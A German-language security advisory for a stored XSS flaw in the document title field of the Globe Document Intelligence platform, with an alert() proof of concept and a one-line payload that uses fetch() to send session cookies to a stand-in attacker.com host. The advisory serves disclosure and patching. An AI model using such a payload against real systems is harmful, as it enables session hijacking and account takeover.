
Öffentlicher Sicherheitshinweis für CVE-2025-65640: Stored-XSS-Schwachstelle in Globe Document Intelligence.
Eine Stored-Cross-Site-Scripting-Schwachstelle (XSS) wurde in der Globe Document Intelligence-Plattform (Version 5.0.0.559) identifiziert. Die Anwendung bereinigt oder kodiert benutzereingegebene Daten in der Eigenschaft "Title" eines neu erstellten Dokuments nicht ordnungsgemäß. Wenn ein authentifizierter Benutzer zu den Übersichtsseiten (z. B. "Task in progress / Recent") navigiert, wird die schädliche Nutzlast im Kontext des Browsers des Opfers reflektiert und ausgeführt.
Diese Schwachstelle ermöglicht es einem authentifizierten Angreifer, bösartigen JavaScript-Code auf dem Server zu speichern. Wenn andere authentifizierte Benutzer (einschließlich Administratorkonten) die betroffenen Seiten aufrufen, wird das Skript automatisch ausgeführt. Während der unten aufgeführte Proof of Concept die Schwachstelle mithilfe eines harmlosen alert() demonstriert, kann ein Angreifer diesen Fehler ausnutzen, um eine Session-Hijacking- und Account-Übernahme zu erreichen. Zum Beispiel würde das Injizieren einer Nutzlast wie die Session-Cookies des Opfers stillschweigend an einen vom Angreifer kontrollierten externen Server exfiltrieren.
<script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script>Um die Schwachstelle zu reproduzieren, kann ein authentifizierter Angreifer die folgenden Schritte ausführen:
<script>alert("XSS")</script>Laut Hersteller wurde diese Schwachstelle in Version 5.1.0.575 behoben. Um dieses Problem zu beheben, wird empfohlen, die Globe Document Intelligence-Plattform auf Version 5.1.0.575 zu aktualisieren.
Dieser Proof of Concept (PoC) wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Die in diesem Dokument beschriebenen Informationen und Codes dürfen nicht für böswillige Aktivitäten oder gegen Systeme ohne ausdrückliche vorherige Genehmigung der Systemeigentümer verwendet werden. Der Autor übernimmt keinerlei Haftung und ist nicht verantwortlich für Missbrauch oder Schäden, die durch die Anwendung des bereitgestellten Materials verursacht werden.